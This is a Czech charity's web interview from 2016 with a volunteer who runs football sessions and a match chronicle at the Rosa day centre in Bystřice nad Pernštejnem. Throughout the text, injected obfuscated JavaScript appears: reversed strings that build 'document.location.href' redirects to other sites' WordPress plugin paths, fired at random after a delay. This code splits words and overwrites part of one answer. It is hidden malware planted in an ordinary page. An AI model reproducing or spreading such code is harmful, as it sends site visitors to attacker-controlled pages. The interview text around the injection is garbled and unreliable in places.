Rainbow page separator

Dobrovolník Roman: Na fotbal do Rosy přicházím několikrát měsíčně

Neděle, 20. listopadu 2016

Dobrovolník Oblastní charity Žďár nad Sázavou Roman pochází z Bystřice nad Pernštejnem, kde pravidelně navštěvuje denní stacionář Rosa. Zde nejen aktivně pomáhá při veřejných akcích, ale také navštěvuje denní stacionář Rosa, kde se setkává s uživateli, kteří mají v oblibě téma fotbalu, probírají jednotlivá utkání, pouští záznamy zápasů a píší kroniku.

Pane Romane, jak jste se stal dobrovolníkem žďárské Charity?
Na myšlenku stát se dobrovolníkem mě přivedla vedoucí denního stacionáře Rosa, která mně tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činnost nabídla. S uživateli stacionáře se znám delší dobu, s některými jsem se aktivně stýkal ještě před vytvořením služby stacionáře. Věnuji se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž fotbalu a mezi uživateli je spousta fotbalových nadšenců, kteří rádi navštěvují místní stadion Spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního klubu Bystřice nad Pernštejnem.

Svého „dobrovolničení“ jste se ujal velmi specificky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tím, co Vás baví a zajímá.
V čem konkrétně Vaše působení v Rose spočívá?
Pouštím uživatelům záznamy odehraných zápasů, společně je komentujeme, rozebíráme, pomáhám jim s vedením kroniky, ukazuji fotky z odehraných zápasů a vyprávím jim zážitky z bystřického fotbalu.

Jak čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se s uživateli scházíte?
Do stacionáře docházím většinou v úterý. To mají uživatelé vyhraněný čas právě na tvorbu kroniky a fotbalové činnosti. Snažím se přijít několikrát do měsíce.

Jaké zápasy si promítáte? Ty místní nebo i ty republikové, či dokonce celosvě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové?
Uživatele zajímají hlavně zápasy místního fotbalového klubu SK Bystřice nad Pernštejnem – Divize D. Republikové nebo celosvě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové pouze v případě mistrovství, nebo když je něčím pro uživatele fotbal zajímavější, například fotbalově atraktivní soupeři.

Chodíte společně i na nějaká utkání?
Uživatelé Rosy na stadion SK Bystřice nad Pernštejnem dochází poměrně čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní klub se stacionářem navázal velmi dobrou spolupráci. Uživatelé několikrát do roka navštíví stadion, ať už jako diváci nějaké soutěže nebo fotbalového utkání nebo se i aktivně zapojují do cvičení. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rok se aktivně účastnili fotbalového dne pořádaného pro nábor nových fotbalistů. Dále mohou navštívit již tradiční akci Charitativní fotbalový turnaj, který SK ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rok pořádal právě pro denní stacionář. Součástí turnaje byla veřejná sbírka, která trvá celý rok 2016 a výtěžek z té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sbírky bude na konci roku 2016 předán Rose.

Zmínili jsme i tvorbu kroniky. Kdo ji vytváří a co v ní lze nalézt?
Kroniku vytváří uživatelé, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve spolupráci se mnou. Když nemohu pomoci já, dohlíží a pomoc poskytují pracovnice stacionáře, které se také o místí fotbal zajímají. Kroniku uživatelé vedou místnímu týmu SK Bystřice nad Pernštejnem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak mužstvu Divize D, tak i bystřickému „béčku“. Kronika se uživatelům daří a ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činnost je velmi baví, vystřihují novinové články, tisknou komentáře z internetu, kreslí a dopisují informace ke každému zápasu. S myšlenkou založit kroniku přišel uživatel Filip, který je velký bystřický fotbalový f$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}anda.

Co Vás na „dobrovolničení“ baví?
Do stacionáře docházím velmi rád. Rozumím si s uživateli i s pracovníky. Rád pomáhám druhým a beru [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jako samozřejmost. Zároveň při některých veřejných akcích, kterých se také účastním, poznávám nové zajímavé lidi. Jsem rád, že můžu patřit do party dobrých lidí
– uživatelů i pracovníků stacionáře.

Kdo může být dobrovolníkem?
Myslím, že v podstatě kdokoliv, kdo má chuť pomáhat a dělat něco prospěšného pro druhé.

Děkuji za rozhovor a přeji, ať se Vašemu fotbalovému týmu daří.
Lenka Šustrová, 14. 11. 2016